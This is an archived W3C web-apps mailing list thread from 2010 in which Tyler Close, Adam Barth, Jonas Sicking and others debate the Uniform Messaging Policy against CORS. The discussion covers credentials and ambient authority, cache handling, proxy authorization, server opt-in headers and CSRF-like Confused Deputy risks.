 Uniform Request. Since this definition is based partly on what MUST NOT be
 included, I don't see any way to extend it.

CORS must not claim that its requests-with-credentials are uniform
requests. That would be incorrect and a violation of the UMP spec.
Instead, CORS could define its requests as
uniform-requests-plus-credentials and give this new construct a new
name. In programmer speak, CORS could extend UMP using composition
rather than inheritance.

 No existing CORS implementation will satisfy the requirements for a Uniform
 Request, as far as I can tell, since it includes information obtained
 from... the referring resource, including its origin. It is possible to
 send a request satisfying the Uniform Request requirements by passing the
 right parameters to CORS (a unique identifier origin would result in
 Origin: null being sent), so the subset relation exists at the protocol
 level. But I don't think any implementation will end up passing the right
 parameters to CRS, so the intersection of the subsets of CORS supported by
 existing implementations does not overlap the UMP subset of CORS.

If it's not possible to coax an existing implementation into sending
Origin: null, then, in the extreme, it's possible to create a newly
generated domain name and send the request from there, so that the
Origin header has a value to which no semantics are attached.

Again, I'm *not* arguing that existing CORS implementations provide a
clean and usable interface for using UMP. They clearly don't. I'm only
arguing that UMP defines functionality that existing implementations
have implicitly agreed to support, since they support sending of
semantically equivalent messages (there was never any guarantee that
the Origin header contained information that was meaningful to the
server). As you pointed out, there's still the issue of redirect
handling, but AFAICT, CORS implementations are not perfectly aligned
here either.

We should open a new thread on the redirect question, as there are
clearly issues that remain to be solved both within CORS itself and
between CORS and UMP. I'd also like the opportunity to convince the WG
that the UMP handling of redirects is the technically superior choice.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 1:00 AM, Jonas Sicking jo...@sicking.cc wrote:
 Another thing that might be worth noting is that if the UA contains a
 HTTP cache (which most popular UAs do), the UA must never use a cached
 response that was the result of a request that was made with
 credentials, when making a request without. The same goes the other
 way around.

I gather this is because sites do not reliably use the Vary header?

When processing a credential-less request, do you use a conditional
GET to validate an existing cache entry that was first retrieved over
a connection that used credentials?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 11:30 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, Feb 3, 2010 at 10:12 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, Feb 3, 2010 at 1:00 AM, Jonas Sicking jo...@sicking.cc wrote:
 Another thing that might be worth noting is that if the UA contains a
 HTTP cache (which most popular UAs do), the UA must never use a cached
 response that was the result of a request that was made with
 credentials, when making a request without. The same goes the other
 way around.

 I gather this is because sites do not reliably use the Vary header?

 I think so yes.

 When processing a credential-less request, do you use a conditional
 GET to validate an existing cache entry that was first retrieved over
 a connection that used credentials?

 The way we do it is that we use the credentials flag as part of the
 cache key, along with the url. The effect is that there's a cache used
 for normal requests, and a separate cache used for credentials
 free requests.

Do you use any special Cache-Control headers to ensure a proxy does
not respond with an entry cached from a request with credentials?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 1:32 PM, Julian Reschke julian.resc...@gmx.de wrote:
 Tyler Close wrote:

 On Wed, Feb 3, 2010 at 1:00 AM, Jonas Sicking jo...@sicking.cc wrote:

 Another thing that might be worth noting is that if the UA contains a
 HTTP cache (which most popular UAs do), the UA must never use a cached
 response that was the result of a request that was made with
 credentials, when making a request without. The same goes the other
 way around.

 I gather this is because sites do not reliably use the Vary header?

 When a shared cache (see Section 13.7) receives a request containing an
 Authorization field, it MUST NOT return the corresponding response as a
 reply to any other request, unless one of the following specific exceptions
 holds:...

 http://greenbytes.de/tech/webdav/rfc2616.html#rfc.section.14.8

AFAICT, RFC 2616 only does a special case for the Authorization
header, which leaves me wondering what shared caches do for other
kinds of credentials, such as cookies or the NTLM authentication that
Jonas referred to. For example, if an origin server responds to a
request with cookies by sending a response with no Vary header and no
Cache-Control: private or other disabling of caching, would the proxy
use the response to respond to a later request without cookies? Do
proxies commonly implement a special case for the Cookie header,
similar to the Authorization header? Do origin servers commonly have
this bug?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Wed, Feb 3, 2010 at 2:12 PM, Julian Reschke julian.resc...@gmx.de wrote:
 We know that Vary doesn't work well in practice because of all the
 bugsshortcomings in IE.

For requests with cookies, there's an interesting tension there
between wanting to support private caching in IE, but wanting to
prevent a proxy from sharing responses with other users. Since we know
the Vary header doesn't work for this case, what's the popular
workaround? Does this workaround rely on undocumented treatment of the
Cookie header by proxies?

I'm currently thinking it would be best for UMP to specify that a
cached response can only be used if it is valid under the rules HTTP
establishes for a shared cache, rather than for a private cache. I
am concerned if this is sufficient to guard against buggy but common
use of cookies by servers, and separately, if it would result in
unnecessary cache misses.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-02 Thread Tyler Close
On Sun, Jan 31, 2010 at 11:03 PM, Maciej Stachowiak m...@apple.com wrote:
 I'm curious what practical differences there are between CORS with the 
 credentials flag
 set to false and the origin set to null, and UMP. Are there any?

The credentials flag in CORS is underspecified, so it's hard to answer
this question.

Since we've all noted that CORS and UMP take a different approach to
the problem, I think it would be confusing to bundle them in a single
spec. If CORS wants to be a superset of UMP, then I think it's best to
write CORS as an extension of UMP, and so referencing UMP, rather than
absorbing it. This specification layout would also make it easier to
communicate the differences between an AnonXMLHttpRequest (or
UniformRequest) and an XHR2; each would link to their corresponding
spec document without needing to select only the relevant
sub-sections.

Since UMP is also much smaller and simpler than CORS, I think it makes
sense to push it through the standardization process at a faster pace
than CORS. For example, I think it is reasonable to move UMP to Last
Call as early as next month, or the even the end of this month.

 Note: in light of the above, I think AnonXMLHttpRequest would be almost the 
 same as XDomainRequest, the only difference being that it would send Origin: 
 null instead of the sender's actual Origin.

As the UMP spec notes, it is within the intersection of what has been
commonly deployed across user-agents. I'm curious to learn Microsoft's
assessment of UMP, since, as you note, it is very close to their own
XDomainRequest.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-02 Thread Tyler Close
On Tue, Feb 2, 2010 at 5:14 PM, Maciej Stachowiak m...@apple.com wrote:

 On Feb 2, 2010, at 11:15 AM, Tyler Close wrote:

  On Sun, Jan 31, 2010 at 11:03 PM, Maciej Stachowiak m...@apple.com wrote:
  I'm curious what practical differences there are between CORS with the 
  credentials flag
  set to false and the origin set to null, and UMP. Are there any?
 
  The credentials flag in CORS is underspecified, so it's hard to answer
  this question.

 Can you be more specific? What is underspecified about it? Sounds like 
 something we should fix.

Nowhere does CORS define what a credential is. Nowhere does it list
specific credentials a browser may have but should not use when the
credential flag is false. Does CORS treat the Origin header as a
credential? What other identifiers are not credentials? What about
proxy credentials?

  Since we've all noted that CORS and UMP take a different approach to
  the problem, I think it would be confusing to bundle them in a single
  spec. If CORS wants to be a superset of UMP, then I think it's best to
  write CORS as an extension of UMP, and so referencing UMP, rather than
  absorbing it. This specification layout would also make it easier to
  communicate the differences between an AnonXMLHttpRequest (or
  UniformRequest) and an XHR2; each would link to their corresponding
  spec document without needing to select only the relevant
  sub-sections.

 CORS algorithms are parameterized, so API specs don't have to link to a 
 specific section, just define the input parameters.

This is far more confusing that just linking to the corresponding
spec. There's too much extra information that only serves to confuse.
The UMP spec will be consumed not just by API spec writers, but also
by Web application developers.

 Does UMP have extension hooks sufficient to allow CORS to be written as a UMP 
 extension as you suggest?

UMP has a declarative specification. You extend UMP the same way you
extend other HTTP-based protocols, by defining new protocol tokens and
attaching semantics to them. For example, CORS would define new
semantics for new values of the Access-Control-Allow-Origin header.

  Since UMP is also much smaller and simpler than CORS, I think it makes
  sense to push it through the standardization process at a faster pace
  than CORS. For example, I think it is reasonable to move UMP to Last
  Call as early as next month, or the even the end of this month.

 I'm not sure this makes sense if we want to maintain the subset relation.

I don't follow, why does maintaining the subset relation preclude Last
Call for UMP? It seems quite unfair for the maturity of the UMP
specification to be held hostage by the CORS specification when UMP
has no dependency on CORS.

 And if we don't want to maintain the subset relation, then I would oppose 
 advancing UMP at all.

 
  Note: in light of the above, I think AnonXMLHttpRequest would be almost 
  the same as XDomainRequest, the only difference being that it would send 
  Origin: null instead of the sender's actual Origin.
 
  As the UMP spec notes, it is within the intersection of what has been
  commonly deployed across user-agents. I'm curious to learn Microsoft's
  assessment of UMP, since, as you note, it is very close to their own
  XDomainRequest.

 Actually, it's not within the intersection, since it requires Origin: null 
 rather than the actual Origin. No user agent currently has an API that 
 generates UMP-conformant requests.

As you said above, there is a subset relation between CORS and UMP,
which puts UMP in the intersection of existing CORS implementations.

With some awkward messing around with iframes and such, I think the
existing implementations can be made to put a non-meaningful
identifier in the Origin header. Not a situation I'd want to work with
going forward, but good enough to claim the intersection.

--Tyler

--
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-14 Thread Tyler Close
On Tue, Jan 12, 2010 at 5:34 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 4:24 PM, Mark S. Miller erig...@google.com wrote:
 The most it can do is ignore such information. It is up to the
 client not to provide such information. It is the job of the standard to
 require the client not to provide it, and to inform server-side authors not
 to expect it.

 Right, but we're working in a threat model where ambient authority is
 confusing to servers can causes them to have vulnerabilities.  If the
 server is smart enough to understand the dangers of ambient authority,
 then we don't need UMP.  CORS would be sufficient.

The client-side requires the UMP restrictions. When a client is about
to send off a request, it doesn't yet know whether or not the server
will ignore the client's ambient authority. To ensure that it must,
the request delivered to the server contains no credentials.

On the server-side, a resource implemented to the UMP security model
doesn't expect requests to bear credentials, since clients are not
expected to send them. There shouldn't be any code branches on the
server-side that are conditional upon receiving credentials.
Consequently, if a malicious client does send credentials, these have
no impact on processing of the request.

 On Tue, Jan 12, 2010 at 4:56 PM, Tyler Close tyler.cl...@gmail.com wrote:
 UMP supports confidentiality where client and server desire
 confidentiality.

 My question, then, is how can a server enjoy the confidentiality
 benefits of UMP without paying the security costs of CORS?

By neither issuing, nor accepting client credentials, so that clients
can access the server's resources without being vulnerable to CSRF
attacks that would break confidentiality.

The confidentiality of a resource can be compromised by a CSRF
vulnerability in a legitimate client. A server can avoid this loss of
confidentiality by providing its clients a security model that is not
vulnerable to CSRF. UMP provides this security model.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-14 Thread Tyler Close
On Thu, Jan 14, 2010 at 11:34 AM, Adam Barth w...@adambarth.com wrote:
 On Thu, Jan 14, 2010 at 9:20 AM, Tyler Close tyler.cl...@gmail.com wrote:
 The confidentiality of a resource can be compromised by a CSRF
 vulnerability in a legitimate client.

 Can you define what you mean by CSRF?  I think we must have different
 ideas about what the term means because I don't understand that
 sentence.

I should have said CSRF-like, by which I mean a Confused Deputy
attack. I've been using the former term since some people find it
easier to understand.

For example, imagine a client using a third-party storage service. To
copy data from one file to another, they do a GET on one URL for the
source file, followed by a POST to another for the destination file.
If the storage service is an attacker, it could tell the client the
source file's URL is the URL for a resource the client can read, but
the storage server cannot. The confidentiality of this resource is
then compromised by a legitimate client that fell victim to a
CSRF-like attack.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-12 Thread Tyler Close
On Mon, Jan 11, 2010 at 5:06 PM, Adam Barth w...@adambarth.com wrote:
 On Mon, Jan 11, 2010 at 12:40 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Sun, Jan 10, 2010 at 2:25 PM, Adam Barth w...@adambarth.com wrote:
 More abstractly, why aren't we worrying about P misbehaving based on
 the ambient authority in R (i.e., the Proxy-Authentication
 information)?  Why do the security considerations for the
 Proxy-Authorization header differ from the security considerations for
 the Authorization header?

 The resource host decides whether or not to accept a request, what
 side-effects are caused, and what information is put in the response.
 We want to prevent ambient authority from having an effect on these
 decisions by the resource host.

 I'm not sure why we're concerned about misuses of ambient authority by
 the resource host but not by the proxy.  If we can trust one to
 operate correctly, why can't we trust the other?

The proxy is only in a position to affect network connectivity,
especially for https: resources where SSL ensures this property.
Similar to client IP address and firewall issues, the UMP is not in a
position to affect access-control decisions based on network
connectivity. The UMP can affect decisions based on credentials issued
by a site to a client and these are the most interesting anyways,
since these are the ones that resources on the public Web commonly
depend upon. The UMP is a tool to help resource authors. A resource
author is not commonly in a position to require use of an
authenticating HTTP proxy.

 The proxy is presumably semantically
 transparent and so has no impact on these decisions by the resource
 host. For https: resources, this transparency is cryptographically
 enforced by the SSL protocol, which tunnels the connection through the
 proxy.

 This seems like a shaky assumption.  For example, imagine a private
 network that allows VPN access via an authenticating proxy.

What security properties are you claiming for this setup?

  Now, the
 ambient authority provided by Proxy-Authentication embues the attacker
 with the ability to issue UMP requests inside the VPN.

form and others already embue the attacker with greater access to
VPN resources, since issued credentials are also included.

 It just seems like the reason for preferring UMP over CORS is that
 we're worried that ambient authority will lead to security
 vulnerabilities.  If that's really a problem, we should remove all
 ambient authority.

Does the first clause of your last sentence imply that you don't
believe CSRF, clickjacking and related attacks are really problems?

It's not feasible to remove all ambient authority. For example, the
client has the authority to send requests from its IP address. So we
draw a line between network connectivity and issued credentials. Proxy
credentials provide network connectivity.

Also, as a practical matter, disallowing Proxy-Authorization might
inhibit use of UMP, since a resource author would be concerned about
the loss of users who are required to use a proxy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 12:29 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 10:51 AM, Tyler Close tyler.cl...@gmail.com wrote:
 It's not feasible to remove all ambient authority. For example, the
 client has the authority to send requests from its IP address. So we
 draw a line between network connectivity and issued credentials. Proxy
 credentials provide network connectivity.

 Also, as a practical matter, disallowing Proxy-Authorization might
 inhibit use of UMP, since a resource author would be concerned about
 the loss of users who are required to use a proxy.

 RIght, this is the essential point: whether we should remove a piece
 of ambient authority is a risk management decision.  Instead of
 dogmatically stomping out all forms of ambient authority,

Are you really accusing me of being dogmatic, or is this just more of
your hyperbole? Your arguments are frequently misleading because their
reasoning relies upon your use of hyperbole. In this case, by
characterizing my argument as dogma, you avoid addressing the
distinction I've drawn between network connectivity and credentials
issued by a resource host. I think it's a principled and useful
distinction and have explained why. Instead of logic, you respond with
hyperbole.

 we ought to
 weigh the costs of removing the authority (in this case compatibility
 issues with existing proxy deployments) with the benefits (greater
 resilience to a class of vulnerabilities).

Absolutely, and I and others commonly do so. For example, the Caja
language also gives careful consideration to what permissions are
ambiently available to Caja objects. In Caja, permission to consume
memory and CPU cycles is ambiently available to objects within a
particular Caja container. This makes a Caja container vulnerable to
DOS attack by a Caja object in that container. Similarly, the UMP
makes network connectivity ambiently available to clients that are
able to issue network requests. Just as Caja deems it too awkward to
deal with DOS at the granularity of individual objects, UMP deems it
too awkward to deal with network connectivity at the granularity of
individual requestors within a user-agent instance. In both cases, the
issues can be addressed at a coarser level of granularity, by
respectively placing memory limits on the Caja container, or not
giving proxy credentials to the user-agent instance.

 The reason we have different beliefs about whether CORS or UMP is a
 better protocol is because we perceve the risks and rewards
 differently.

I wish that were true. It would make for a more productive discussion.

  Ultimately, authors are in a better position to weigh
 these factors than we are, which is why we should provide both APIs.

One of the problems here is that authors don't get to choose the
security model for their code, but are constrained by the choice made
by resources that they interact with. If you host a resource that uses
the CORS security model, then my client code must work within that
model. This is especially onerous, since under the CORS model, it is
the client code that is vulnerable to CSRF-like attacks, not the
target resource. In other words, if you choose the CORS model, then
any CSRF-like vulnerabilities in my client code are my problem, even
though the CORS model doesn't provide me a way to feasibly defend
myself against these vulnerabilities.

The security model is contagious. Even if we put out two APIs, one
will become dominant. Hopefully the continued lack of cookies in
XDomainRequest will sufficiently predispose the market towards UMP, so
the confusion caused by standardizing two security models will
ultimately have little effect.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
I believe all three protocols attach the same semantics to the
Access-Control-Allow-Origin: * response header sent in response to a
GET or POST request. Unless you know of a significant difference in
the semantics, breaking compatibility seems unwarranted.

--Tyler

On Tue, Jan 12, 2010 at 12:54 PM, Adam Barth aba...@webkit.org wrote:
 In the current draft of UMP, the client can opt-in to UMP by choosing
 to use the UniformMessaging API, but the server is unable to force
 clients to use UMP because the way the server opts into the protocol
 is by returning the Access-Control-Allow-Origin header.
 Unfortunately, when the server returns the Access-Control-Allow-Origin
 header, the server also opts into the CORS and XDomainRequest
 protocols.  The server operator might be reticent to opt into these
 protocols if he or she is worried about ambient authority.

 I recommend using a new header, like Allow-Uniform-Messages: level-1
 so that servers can opt into UMP specifically.

 Adam




-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 2:44 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 2:19 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 12:54 PM, Adam Barth aba...@webkit.org wrote:
 In the current draft of UMP, the client can opt-in to UMP by choosing
 to use the UniformMessaging API, but the server is unable to force
 clients to use UMP because the way the server opts into the protocol
 is by returning the Access-Control-Allow-Origin header.
 Unfortunately, when the server returns the Access-Control-Allow-Origin
 header, the server also opts into the CORS and XDomainRequest
 protocols.  The server operator might be reticent to opt into these
 protocols if he or she is worried about ambient authority.

 I recommend using a new header, like Allow-Uniform-Messages: level-1
 so that servers can opt into UMP specifically.

 I believe all three protocols attach the same semantics to the
 Access-Control-Allow-Origin: * response header sent in response to a
 GET or POST request. Unless you know of a significant difference in
 the semantics, breaking compatibility seems unwarranted.

 Let my phrase my question another way.  Suppose the following situation:

 1) I'm a server operator and I want to provide a resource to other web sites.
 2) I've been reading public-webapps and I'm concerned about the
 ambient authority in CORS.

 How can I share my resource with other web sites and enjoy the
 security benefits of UMP?

Follow the advice given in the Security Considerations section of
the UMP spec:

http://dev.w3.org/2006/waf/UMP/#security

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 2:57 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 2:47 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 2:44 PM, Adam Barth w...@adambarth.com wrote:
 Let my phrase my question another way.  Suppose the following situation:

 1) I'm a server operator and I want to provide a resource to other web 
 sites.
 2) I've been reading public-webapps and I'm concerned about the
 ambient authority in CORS.

 How can I share my resource with other web sites and enjoy the
 security benefits of UMP?

 Follow the advice given in the Security Considerations section of
 the UMP spec:

 http://dev.w3.org/2006/waf/UMP/#security

 As a server operator, why can't I follow that advice with CORS?

You can.

 Nothing there seems specific to UMP.

UMP is more restrictive on the server than is CORS. UMP doesn't make
the client's ambient authority visible to the server.

 I don't understand how UMP is helping server operators deal with the
 risks of ambient authority.  When a server operator makes a resource
 available via UMP, they're also making it available to CORS with it's
 attendant security model.

UMP is helping server operators define APIs that enable their clients
to defend themselves against CSRF-like vulnerabilities. A CSRF-like
attack takes place on the client-side, not the server-side. The
server's behavior needs to be restricted in a way that enables the
client to communicate its wishes, while defending itself against CSRF.
In particular, the client must be able to make a request without
applying its credentials to the request, so the server must handle the
request without demanding credentials be provided.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CfC: to publish First Public Working Draft of Uniform Messaging Policy spec; deadline January 19

2010-01-12 Thread Tyler Close
support

On Tue, Jan 12, 2010 at 3:29 PM, Arthur Barstow art.bars...@nokia.com wrote:
 This is a Call for Consensus (CfC) to publish the First Public Working Draft
 (FPWD) of the Uniform Messaging Policy (UMP) spec, latest Editor's Draft at:

  http://dev.w3.org/2006/waf/UMP/

 This CfC satisfies the group's requirement to record the group's decision
 to request advancement.

 By publishing this FPWD, the group sends a signal to the community to begin
 reviewing the document. The FPWD reflects where the group is on this spec at
 the time of publication; it does not necessarily mean there is consensus on
 the spec's contents.

 As with all of our CfCs, positive response is preferred and encouraged and
 silence will be assumed to be assent.

 The deadline for comments is January 19.

 -Art Barstow

 Begin forwarded message:

 From: ext Tyler Close tyler.cl...@gmail.com
 Date: January 7, 2010 8:21:10 PM EST
 To: public-webapps public-webapps@w3.org
 Subject: [UMP] A declarative version of Uniform Messaging Policy
 Archived-At:
 http://www.w3.org/mid/5691356f1001071721k3ca16400qe5a2f4d6d966c...@mail.gmail.com

 I've updated the UMP spec to use a declarative style and moved the
 algorithmic specification to a non-normative appendix. Hopefully this
 organization will appeal to fans of either style. See:

 http://dev.w3.org/2006/waf/UMP/

 I'm hoping to move UMP forward to FPWD as soon as possible. Please let
 me know if there is anything I need to do to expedite this process.

 Thanks,
 --Tyler






-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CfC: to publish First Public Working Draft of Uniform Messaging Policy spec; deadline January 19

2010-01-12 Thread Tyler Close
Hi Jonas,

I too like the subset relationship between UMP and CORS and hope to
retain it. AFAIK, the only issue here is whether or not the user-agent
can follow a non-uniform redirect. There are two ways to resolve this:
UMP forbids following or CORS enables following. Is there any chance
of the latter?

--Tyler

On Tue, Jan 12, 2010 at 4:03 PM, Jonas Sicking jo...@sicking.cc wrote:
 I support this.

 For the record: I have admittedly not been following the recent
 discussions, but some of it has worried me a bit. I liked how UMP was
 originally a subset of CORS, in that it gave some amount of
 compatibility between the two models. In particular the ability for a
 UMP client to talk to a CORS server seems like a win for both specs. I
 also believe it makes switching between the two models slightly
 easier, which again I think is a win for all involved parties.

 If that is no longer the case, I hope that we'll end up back there.

 In any case, whatever the state is I support the publication of this
 FPWD. And please do keep technical discussions in the existing threads
 (and new ones of course). I just wanted to raise some technical
 concerns so that no one misunderstood what my support for the FPWD
 meant.

 / Jonas

 On Tue, Jan 12, 2010 at 3:29 PM, Arthur Barstow art.bars...@nokia.com wrote:
 This is a Call for Consensus (CfC) to publish the First Public Working Draft
 (FPWD) of the Uniform Messaging Policy (UMP) spec, latest Editor's Draft at:

  http://dev.w3.org/2006/waf/UMP/

 This CfC satisfies the group's requirement to record the group's decision
 to request advancement.

 By publishing this FPWD, the group sends a signal to the community to begin
 reviewing the document. The FPWD reflects where the group is on this spec at
 the time of publication; it does not necessarily mean there is consensus on
 the spec's contents.

 As with all of our CfCs, positive response is preferred and encouraged and
 silence will be assumed to be assent.

 The deadline for comments is January 19.

 -Art Barstow

 Begin forwarded message:

 From: ext Tyler Close tyler.cl...@gmail.com
 Date: January 7, 2010 8:21:10 PM EST
 To: public-webapps public-webapps@w3.org
 Subject: [UMP] A declarative version of Uniform Messaging Policy
 Archived-At:
 http://www.w3.org/mid/5691356f1001071721k3ca16400qe5a2f4d6d966c...@mail.gmail.com

 I've updated the UMP spec to use a declarative style and moved the
 algorithmic specification to a non-normative appendix. Hopefully this
 organization will appeal to fans of either style. See:

 http://dev.w3.org/2006/waf/UMP/

 I'm hoping to move UMP forward to FPWD as soon as possible. Please let
 me know if there is anything I need to do to expedite this process.

 Thanks,
 --Tyler








-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
UMP supports confidentiality where client and server desire
confidentiality. I am mystified as to why you might think otherwise.
Concern over CSRF does not preclude concern over confidentiality, to
the contrary, it requires it.

--Tyler

On Tue, Jan 12, 2010 at 3:24 PM, Adam Barth w...@adambarth.com wrote:
 Before I respond to the below, I'd like to clarify one point.  Does
 UMP aim to provide confidentiality or are we concerned only with
 integrity?  It seems you consistently ignore confidentiality risks
 (e.g., your response below is entirely about CSRF).

 Adam


 On Tue, Jan 12, 2010 at 3:10 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 2:57 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 2:47 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 2:44 PM, Adam Barth w...@adambarth.com wrote:
 Let my phrase my question another way.  Suppose the following situation:

 1) I'm a server operator and I want to provide a resource to other web 
 sites.
 2) I've been reading public-webapps and I'm concerned about the
 ambient authority in CORS.

 How can I share my resource with other web sites and enjoy the
 security benefits of UMP?

 Follow the advice given in the Security Considerations section of
 the UMP spec:

 http://dev.w3.org/2006/waf/UMP/#security

 As a server operator, why can't I follow that advice with CORS?

 You can.

 Nothing there seems specific to UMP.

 UMP is more restrictive on the server than is CORS. UMP doesn't make
 the client's ambient authority visible to the server.

 I don't understand how UMP is helping server operators deal with the
 risks of ambient authority.  When a server operator makes a resource
 available via UMP, they're also making it available to CORS with it's
 attendant security model.

 UMP is helping server operators define APIs that enable their clients
 to defend themselves against CSRF-like vulnerabilities. A CSRF-like
 attack takes place on the client-side, not the server-side. The
 server's behavior needs to be restricted in a way that enables the
 client to communicate its wishes, while defending itself against CSRF.
 In particular, the client must be able to make a request without
 applying its credentials to the request, so the server must handle the
 request without demanding credentials be provided.

 --Tyler

 --
 Waterken News: Capability security on the Web
 http://waterken.sourceforge.net/recent.html





-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 3:04 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 1:59 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 12:29 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 10:51 AM, Tyler Close tyler.cl...@gmail.com wrote:
 It's not feasible to remove all ambient authority. For example, the
 client has the authority to send requests from its IP address. So we
 draw a line between network connectivity and issued credentials. Proxy
 credentials provide network connectivity.

 Also, as a practical matter, disallowing Proxy-Authorization might
 inhibit use of UMP, since a resource author would be concerned about
 the loss of users who are required to use a proxy.

 RIght, this is the essential point: whether we should remove a piece
 of ambient authority is a risk management decision.  Instead of
 dogmatically stomping out all forms of ambient authority,

 Are you really accusing me of being dogmatic, or is this just more of
 your hyperbole?

 Quite to the contrary, you're *not* being dogmatic, which is my point.
  We ought not to be dogmatic about banning ambient authority because,
 as you say, that's impractical.  Instead we ought to consider the
 risks and rewards on a case-by-case basis.

 Your arguments are frequently misleading because their
 reasoning relies upon your use of hyperbole. In this case, by
 characterizing my argument as dogma, you avoid addressing the
 distinction I've drawn between network connectivity and credentials
 issued by a resource host. I think it's a principled and useful
 distinction and have explained why. Instead of logic, you respond with
 hyperbole.

 I'm not sure what you mean by hyperbole, but I agree with you that
 there's a distinction between network connectivity and credentials
 issued by a resource host.  Credentials issued by a resource host are
 both higher risk and higher benefit than network connectivity
 credentials.  How these risks and benefits balance varies depending on
 the deployment scenario.

Thank you for addressing this distinction.

Hyperbole is extreme and misleading exaggeration. In some cases, your
arguments take the form of presenting a choice between your position
and an obviously ridiculous position. For example, above you say we
must choose between a case-by-case approach and a dogmatic approach.
Such arguments preclude the existence of a third way that is not
ridiculous. In the above case, I am advocating such a third way. I
think we can take a principled approach that establishes the criteria
by which we decide what ambient authority is allowed: network
connectivity versus credentials issued by a resource host. The
advantage of a principled approach versus a case-by-case approach is
that it establishes the goal to be achieved and so creates a coherent
policy that others can implement to. In contrast, the Same Origin
Policy was clearly defined on a case-by-case basis and so has become
incoherent.

The form of argument you used in this case is known as a false
dichotomy. Please refrain from using this tactic. It is deceptive. Be
careful whenever you engage in exaggeration. It is always misleading,
and often rude.

 Even if we put out two APIs, one will become dominant.

 Right, the market will decide which protocol is most useful (i.e.,
 creates the most value).  That seems like a good thing.

That would abdicate our responsibility as a standards body. If that's
the best we can accomplish in this case, then so be it. It is not what
we should be aiming for. Sometimes, choosing a standard way creates
the most value. I believe this is one of those cases.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-11 Thread Tyler Close
On Sun, Jan 10, 2010 at 2:25 PM, Adam Barth w...@adambarth.com wrote:
 I don't quite understand this part of that text:

 [[
 In this case, the request
 sent by the user-agent is not a uniform request; however, the request
 ultimately delivered to the resource host will be, since any
 Proxy-Authorization request header is removed by the proxy before
 forwarding the request to the resource host.
 ]]

 Concretely, suppose:

 1) The user has authenticated to a proxy P using the
 Proxy-Authenticate / Proxy-Authentication protocol.
 2) The user visits web site A which uses the UniformRequest API to
 generate a request R to web site B.
 3) Based on that text, it sounds like R is delivered to P with the
 Proxy-Authentication information intact.  Presumably the proxy will
 forward the request to B.
 4) B responds with Access-Control-Allow-Origin: *.

 Now, is B's response delivered to A?

Yes, assuming that user-agent is configured to use that proxy server.
Note that the request forwarded to B does *not* have a
Proxy-Authorization header.

 More abstractly, why aren't we worrying about P misbehaving based on
 the ambient authority in R (i.e., the Proxy-Authentication
 information)?  Why do the security considerations for the
 Proxy-Authorization header differ from the security considerations for
 the Authorization header?

The resource host decides whether or not to accept a request, what
side-effects are caused, and what information is put in the response.
We want to prevent ambient authority from having an effect on these
decisions by the resource host. The proxy is presumably semantically
transparent and so has no impact on these decisions by the resource
host. For https: resources, this transparency is cryptographically
enforced by the SSL protocol, which tunnels the connection through the
proxy.

--Tyler

-- 
Waterken News: Capability security on the Web
